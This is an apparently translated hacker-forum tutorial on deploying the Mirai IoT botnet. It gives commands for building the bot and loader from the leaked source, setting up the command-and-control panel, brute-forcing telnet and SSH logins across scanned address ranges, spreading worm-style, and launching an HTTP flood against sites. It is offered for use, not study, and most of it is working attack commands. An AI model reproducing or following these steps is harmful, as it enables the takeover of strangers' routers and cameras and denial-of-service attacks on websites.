Installing and configuring the Mirai IOT botnet

[Hacker]

I won't give a lot of shit, I'll just say that the software is working, it turns off sites with a bang. And this is the first Russian manual for installing Mirai. "Historical bullshit".

We will need two VPS KVM servers and a domain. Virtualization is exactly KVM, OpenVZ will pass this time.

I take my servers here - https://www.nforce.com/

On one server we will install the botnet itself, on the second we will scan bots (brutalize).

IMPORTANT. Servers must be based on Debian 8 and have at least 1GB of RAM.

Any domain, no difference.

Sorry of course, but I won't tell you how to attach a domain to a VPS. It's not difficult, you can figure it out for yourself.

We connect to our server via PuTTY and start.

# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang electric-fence screen sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y

When installing MySQL, you will need to create a password to access MySQL for the root user. You can come up with a normal password, without any "qwerty"

Write it down somewhere, we'll still need it.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
# bash < <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm install go1.4
# gvm use go1.4 [--default]
# gvm install go1.4 -B
# gvm use go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm use go1.5
# gvm install go1.8
# gvm use go1.8

After installing all the utilities, download the bot's source code - https://github.com/jgamblin/Mirai-Source-Code and upload it to the server. Using the wget command, or simply using the WinSCP program.

# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc

# ./enc string vlmi.su (we write our own domain, which is screwed to the server) and press Enter

Here you will see the following text -

XOR'ing 14 bytes of data...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - there will be a different number for you, so don't worry, everything is correct.

Copy all this text.

Open the table.c file in the mirai/bot folder using the nano editor or WinSCP.

Should see this - https://prnt.sc/gcxa2m

The string add_entry(TABLE_CNC_DOMAIN - everything that is in quotation marks is changed to your text that you just copied. Instead of " 30 ", we write our own number, which we also just copied. We do the same with the add_entry line (TABLE_SCAN_CB_DOMAIN

Save it and close the editor.

Let's move on.

Open the mirai/cnc/main.go file with the editor

We see this - https://prnt.sc/gcxdtz

change "127.0.0.1" to " 127.0.0.1:3306"

"password" is changed to our MySQL password that we entered earlier.

Save the file and close the editor.

Just copy all this shit, I won't tell you why it's necessary -

# mkdir /etc/xcompile
# cd /etc/xcompile
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
# wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
# wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2
# rm *.tar.bz2
# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l
# export PATH=$PATH:/etc/xcompile/armv4l/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go
# go get github.com/go-sql-driver/mysql
# go get github.com/mattn/go-shellwords

Fucked up.

# cd Mirai-Source-Code-master/mirai
# ./build.sh debug telnet
# ./build.sh release telnet
# cd Mirai-Source-Code-master/mirai/release
# mv mirai* /var/www/html
# cd /var/www/html
# mkdir bins
# mv * bins/
# cd

Now MySQL.

# mysql -u root -p

You will be asked for your password here. Enter the password that you previously set.

# create database mirai;
# use mirai

Now copy all the text from here - https://pastebin.com/QVD48J8s insert, and press Enter.

Copy the text from here - https://pastebin.com/JwYSgE4v

Instead of anna-senpai, write your username. Any. It's the same with myawesomepassword. We will need this data to access the bot's control panel.

It should be like this-REPLACE INTO users VALUES (NULL, 'usersuper41', 'superbotner666', 0, 0, 0, 0, -1, 1, 30, ");

Copy, paste, and press Enter.

Now you can go out.

# exit

It's almost done.

# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# screen ./cnc

You should see the label MySQL DB opened

Don't close this session, open a new one.

http://prntscr.com/gcxunx instead of vlmi.su write your domain, and click Open.

Enter your username and password. In my case, this is -
usersuper41
superbotner666

That's it, we're in the bot's control panel.

Now we need bots. Everything is simple here, no installations are needed.

Configuring the loader.

Loader is needed so that bots can be added from text files. Let's say we've got a lot of devices ( routers, cameras, phones ) and you need a loader to add them to the bot.

Also loader is a "worm"

They infected one device, and it will brutalize and add bots further down the chain.

We connect to our server via PuTTY and WinSCP.

Using WinSCP, we find the main.c file in the Mirai-Source-Code-master/dlr folder

We write the IP of our server as shown in the screenshot - http://prntscr.com/gde6jr

We leave the commas, as it should be. Save and close it.

Now with PyTTY we go to our server and write -

# cd Mirai-Source-Code-master/dlr
# chmod 777 *
# ./build.sh
# cd release
# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Now open WinSCP and find the main. c file in the Mirai-Source-Code-master/loader/src folder

Change to your IP address as shown in the screenshot - http://prntscr.com/gdefbr

Save and close it.

Via PuTTY -

# cd Mirai-Source-Code-master/loader
# ./build.sh

Using WinSCP, open the scanListen file.go which can be found in the folder Mirai-Source-Code-master/mirai/tools

Changing to your server IP - http://prntscr.com/gdezsh

Then with PyTTY -

# cd Mirai-Source-Code-master/mirai/tools
# go build scanListen.go

Now we have a new file - scanListen (without .go, just scanListen)

scanListen should be moved to the Mirai-Source-Code-master/loader folder

Just use WinSCP to throw it in the loader folder

Now let's check if everything works

# ./loader

If you see what is on the screen, then everything is correct - https://prnt.sc/gdei1g

If you encounter any errors, write to the topic and I'll help you.

To load bots from the list, throw the text file in the loader folder and type the command -

# cat list.txt | ./loader

Everyone, all the bots that you have typed will be with you, will lay down sites on your command.

I personally did not use this method, I found an easier way.

Here we need a second server. Also on Debian 8.

# apt-get update -y
# apt-get upgrade -y
# apt-get install python-paramiko -y
# apt-get install zmap -y

We need zmap for port scanning. The principle of operation is similar to KPortScan, only 50 times faster.

Copy all the code from here - https://pastebin.com/9tq1pfAv and save as scan.py

Here you can add your own passwords and logins - http://prntscr.com/gdesb1

Don't touch the combo string!

Here you need to register the IP of the server where the bot is located - http://prntscr.com/gdetbn

We change everything and save it.

File scan.py we can send it to any location on our server. On the second server, which is purely for scanning, the one on which the bot is not touched.

We need IP addresses that we will scan.

#zmap -p22-o list.txt -B 100M (you can also scan other ports, I always scanned 22 or 23)

All results will be in the file list.txt

After you have collected the IP (the larger the better ) file list.txt we throw it next to the scan file.py and write -

# python scan.py list.txt 500

That's it, we sit and watch our botnet grow.

When there are at least 200 bots, you can start loader.

To do this, go to the server where the botnet is installed and -

# cd Mirai-Source-Code-master/loader
# ulimit -n 9999999
# ./scanListen | ./loader

Now the bot will work on the "worm" principle and finish off more bots.

Command for DDoS attack (you need to enter it in the botnet control panel)

# http 1.1.1.1 350 domain=1.1.1.1 path=/ conns=999999999

Well, that's all. Thanks for attention.